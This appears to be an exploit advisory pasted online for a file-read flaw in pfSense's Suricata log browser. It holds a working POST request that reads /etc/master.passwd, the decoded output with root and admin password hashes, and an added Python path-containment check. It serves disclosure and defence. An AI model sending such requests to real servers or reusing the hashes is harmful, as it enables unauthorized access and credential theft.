vietjovi

LFI vulnerability in Suricata 1.4.6 on Pfsense 2.1.3

Jun 27th, 2019 (edited)
# Exploit Title: LFI (Local File Inclusion) vulnerability in Suricata 1.4.6 on Pfsense 2.1.3
# Date: 2014-05-21
# Software Link: https://www.pfsense.org/
# Version: 2.1.3
# Vendor: Pfsense
# Exploit Author: Vu Van Hieu - hieuvnuhcm@gmail.com/hieuvu@uns.vn, Nguyen Quoc Viet - vietnguyen@uns.vn/vietjovi@gmail.com
# CVE: CVE-2020-19678
# Category: IDS
# Tested on: Firefox

# Description
# There is an LFI (Local File Inclusion) vulnerability in Suricata 1.4.6 pkg v1.0.1 on Pfsense 2.1.3.
# It allows an attacker to include files on the server through the web browser and read any file on the server.
# The vulnerability allows remote attackers to retrieve arbitrary files via the file parameter to /suricata/suricata_logs_browser.php

# POC
This is the POST request sent when you open https://Your_Pfsense_Server/suricata/suricata_logs_browser.php. You can modify the "file" parameter to read any file (example: /etc/master.passwd):
+ HTTP POST header:
```
Host: Your_Pfsense_Server
User-Agent: Mozilla/5.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: https://Your_Pfsense_Server/suricata/suricata_logs_browser.php
Content-Length: 132
Cookie: cookie_test=1400576638; PHPSESSID=7d20151aeace555ee38d8d923f47c3aa
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

__csrf_magic=sid:4c06775fcb95114389a0da397f509158d261ea54,1400573055&action=load&file=/etc/master.passwd
```

+ The server responds with Base64-encoded data:
```
|0|/etc/master.passwd|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|
```

+ Decoding the Base64 content gives:
```
# $FreeBSD: src/etc/master.passwd,v 1.39 2004/08/01 21:33:47 markm Exp $
#
root:$1$dSJImFph$GvZ7.1UbuWu.Yb8etC0re.:0:0::0:0:Charlie &:/root:/bin/sh
toor:*:0:0::0:0:Bourne-again Superuser:/root:
daemon:*:1:1::0:0:Owner of many system processes:/root:/usr/sbin/nologin
operator:*:2:5::0:0:System &:/:/usr/sbin/nologin
bin:*:3:7::0:0:Binaries Commands and Source:/:/usr/sbin/nologin
tty:*:4:65533::0:0:Tty Sandbox:/:/usr/sbin/nologin
kmem:*:5:65533::0:0:KMem Sandbox:/:/usr/sbin/nologin
games:*:7:13::0:0:Games pseudo-user:/usr/games:/usr/sbin/nologin
news:*:8:8::0:0:News Subsystem:/:/usr/sbin/nologin
man:*:9:9::0:0:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
sshd:*:22:22::0:0:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
smmsp:*:25:25::0:0:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin
mailnull:*:26:26::0:0:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin
bind:*:53:53::0:0:Bind Sandbox:/:/usr/sbin/nologin
proxy:*:62:62::0:0:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin
_pflogd:*:64:64::0:0:pflogd privsep user:/var/empty:/usr/sbin/nologin
www:*:80:80::0:0:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
nobody:*:65534:65534::0:0:Unprivileged user:/nonexistent:/usr/sbin/nologin
dhcpd:*:1002:1002::0:0:DHCP Daemon:/nonexistent:/sbin/nologin
_dhcp:*:65:65::0:0:dhcp programs:/var/empty:/usr/sbin/nologin
_isakmpd:*:68:68::0:0:isakmpd privsep:/var/empty:/sbin/nologin
uucp:*:66:66::0:0:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico
pop:*:68:6::0:0:Post Office Owner:/nonexistent:/usr/sbin/nologin
_ntp:*:123:123::0:0:NTP daemon:/var/empty:/sbin/nologin
_relayd:*:913:913::0:0:Relay Daemon:/var/empty:/usr/sbin/nologin
admin:$1$dSJImFph$GvZ7.1UbuWu.Yb8etC0re.:0:0::0:0:System Administrator:/root:/etc/rc.initial
test:*LOCKED*$1$Mj1cDit2$AJheYAjUuer0kgTXwzuts/:2000:65534::0:0::/home/test:/sbin/nologin
```
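The containment check the log browser needed, as an added illustration in Python that is neither pfSense's nor the advisory's code (the project's own change is the commit linked under REF): the `file` value from a POST body like the one above is resolved against an assumed log directory and refused if it is absolute, contains a NUL byte, or escapes that directory after canonicalisation.

```python
import os
from typing import Optional
from urllib.parse import parse_qs

# Assumed location of the files the log browser is meant to serve;
# a stand-in for this example, not pfSense's real layout.
SURICATA_LOG_DIR = "/var/log/suricata"


def resolve_requested_log(base_dir: str, requested: str) -> Optional[str]:
    """Return the canonical path for `requested` if it stays under base_dir, else None.

    os.path.join(base, "/etc/master.passwd") silently discards the base, which is
    how an unchecked `file` parameter turns into arbitrary file read, so absolute
    paths are rejected first. Traversal ("../") is neutralised by canonicalising
    and then checking containment with commonpath, which, unlike startswith(),
    does not let a sibling such as /var/log/suricata-old through. NUL bytes are
    rejected because PHP's file functions historically truncated at them.
    """
    base = os.path.realpath(base_dir)
    if not requested or "\x00" in requested or os.path.isabs(requested):
        return None
    candidate = os.path.realpath(os.path.join(base, requested))
    if os.path.commonpath([base, candidate]) != base:
        return None
    return candidate


def check_log_request(body: str, base_dir: str = SURICATA_LOG_DIR) -> dict:
    """Decide whether a body of the shape in the advisory (action=load&file=...)
    may be served, and why; the refusal is the event worth logging."""
    params = parse_qs(body, keep_blank_values=True)
    action = params.get("action", [""])[0]
    requested = params.get("file", [""])[0]
    if action != "load":
        return {"allowed": False, "reason": "unsupported action", "path": None}
    path = resolve_requested_log(base_dir, requested)
    if path is None:
        return {"allowed": False, "reason": "file outside log directory", "path": None}
    return {"allowed": True, "reason": "ok", "path": path}


if __name__ == "__main__":
    # Constructed sample bodies: the advisory's POC shape, a traversal, a legitimate one.
    for body in ("__csrf_magic=sid:example,1&action=load&file=/etc/master.passwd",
                 "action=load&file=../../etc/master.passwd",
                 "action=load&file=suricata_em0/alerts.log"):
        print(body, "->", check_log_request(body))
```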

# REF
https://github.com/pfsense/pfsense-packages/pull/659
https://github.com/pfsense/pfsense-packages/commit/59ed3438729fd56452f58a0f79f0c288db982ac3
http://www.2ngon.com/2015/01/lfi-vulnerability-suricata-146-pkg-v101.html
https://2ng0n.blogspot.com/2015/01/lfi-vulnerability-suricata-146-pkg-v101.html